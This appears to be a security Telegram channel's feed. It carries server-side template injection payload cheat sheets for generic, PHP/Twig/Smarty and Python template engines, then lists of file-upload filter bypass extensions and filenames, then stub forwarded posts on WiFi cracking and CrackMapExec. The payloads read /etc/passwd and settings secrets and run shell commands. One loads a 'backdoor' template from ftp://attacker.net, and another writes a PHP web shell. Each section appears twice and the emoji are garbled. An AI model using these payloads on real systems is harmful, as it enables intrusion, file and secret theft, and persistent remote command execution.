SSTI (Server Side Template Injection)
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
๐5โค3๐1
File Upload Bypass -
Blacklisting Bypass
PHP โ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP โ .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp โ .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion โ .cfm, .cfml, .cfc, .dbm
Perl โ .pl, .cgi
Using random capitalization โ .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
Blacklisting Bypass
PHP โ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP โ .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp โ .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion โ .cfm, .cfml, .cfc, .dbm
Perl โ .pl, .cgi
Using random capitalization โ .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
๐11๐คฉ3๐3โค1
Forwarded from WiFi Security
Wifi Penetration Testing : WPA2/WPA3 Handshake Capture & Cracking Workflow
๐2โค1
Forwarded from ๐ฅOSCP Training๐ฅ๐กโ๏ธ๐จ๐ปโ๐ป
Crackmapexec (CME)
๐บ๐ฒ Please share this post with friends who you think might be interested if you liked it.
๐ช๐ธ Si te gustรณ esta publicaciรณn, compรกrtela con tus amigos que creas que puedan estar interesados.
๐ท๐บ ะัะปะธ ะฒะฐะผ ะฟะพะฝัะฐะฒะธะปะฐัั ััะฐ ะฟัะฑะปะธะบะฐัะธั, ะฟะพะดะตะปะธัะตัั ะตั ั ะดััะทััะผะธ, ะบะพัะพััะผ ััะพ ะผะพะถะตั ะฑััั ะธะฝัะตัะตัะฝะพ.
๐บ๐ฒ Please share this post with friends who you think might be interested if you liked it.
๐ช๐ธ Si te gustรณ esta publicaciรณn, compรกrtela con tus amigos que creas que puedan estar interesados.
๐ท๐บ ะัะปะธ ะฒะฐะผ ะฟะพะฝัะฐะฒะธะปะฐัั ััะฐ ะฟัะฑะปะธะบะฐัะธั, ะฟะพะดะตะปะธัะตัั ะตั ั ะดััะทััะผะธ, ะบะพัะพััะผ ััะพ ะผะพะถะตั ะฑััั ะธะฝัะตัะตัะฝะพ.
๐ฅ1